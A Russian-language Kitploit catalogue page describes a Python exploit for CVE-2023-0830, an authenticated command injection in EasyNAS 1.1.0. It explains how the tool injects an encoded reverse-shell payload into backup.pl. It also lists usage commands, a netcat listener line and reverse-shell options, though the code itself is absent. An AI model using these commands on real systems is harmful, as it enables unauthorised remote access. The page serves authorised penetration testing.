Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-0830 — Эксплойт для EasyNAS версии 1.1.0. Используемая уязвимость — это недостаток внедрения команд, который требует аутентификации. | Kitploit
Инструменты/GitHubGitHub/xbz0n/cve-2023-0830
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Эксплойт для EasyNAS версии 1.1.0. Используемая уязвимость — это недостаток внедрения команд, который требует аутентификации.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-0830: Эксплойт аутентифицированной инъекции команд в ОС EasyNAS 1.1.0

Этот Python-скрипт представляет собой мощный эксплойт для EasyNAS версии 1.1.0 с расширенной функциональностью, включая встроенный слушатель. Эксплуатируемая уязвимость — это недостаток инъекции команд, требующий аутентификации.

Скрипт устанавливает сессию с целевым сервером, затем отправляет запрос на вход с предоставленными учётными данными. После успешной аутентификации скрипт формирует полезную нагрузку, которая при выполнении открывает обратное соединение к указанным пользователем IP-адресу и порту. Эта полезная нагрузка кодируется в URL и Base64, а затем внедряется в файл backup.pl на сервере через поддельный GET-запрос.

CVE: CVE-2023-0830

Автор эксплойта

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Домашняя страница разработчика

https://www.easynas.org

Возможности

  • Встроенный слушатель обратной оболочки — не нужен отдельный процесс netcat
  • Автоматическое определение IP-адреса для слушателя
  • Возможность использования различных типов оболочки (bash, sh, python)
  • Поддержка HTTP и HTTPS
  • Поддержка внешних слушателей

Использование

Базовое использование со встроенным слушателем (рекомендуется):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

Использование внешнего слушателя (сначала запустите nc -lvnp 4444):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

Опции:

root@kitploit:~
--mode {shell,reverse}    Режим эксплуатации: shell (встроенная обратная оболочка) или reverse (внешний слушатель)
--lhost IP_ADDRESS        IP-адрес для слушателя обратной оболочки (определяется автоматически по умолчанию)
--lport PORT              Порт для слушателя обратной оболочки (по умолчанию: 4444)
--protocol {http,https}   Используемый протокол (по умолчанию: https)
--verbose                 Включить подробный вывод
--shell {bash,sh,python}  Укажите тип оболочки для встроенного слушателя (по умолчанию: bash)

Зависимости

  • Python 3
  • Библиотека Requests

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Всегда получайте явное разрешение перед запуском тестов на проникновение в сети или системы.

Пожалуйста, используйте ответственно.

Скачать инструмент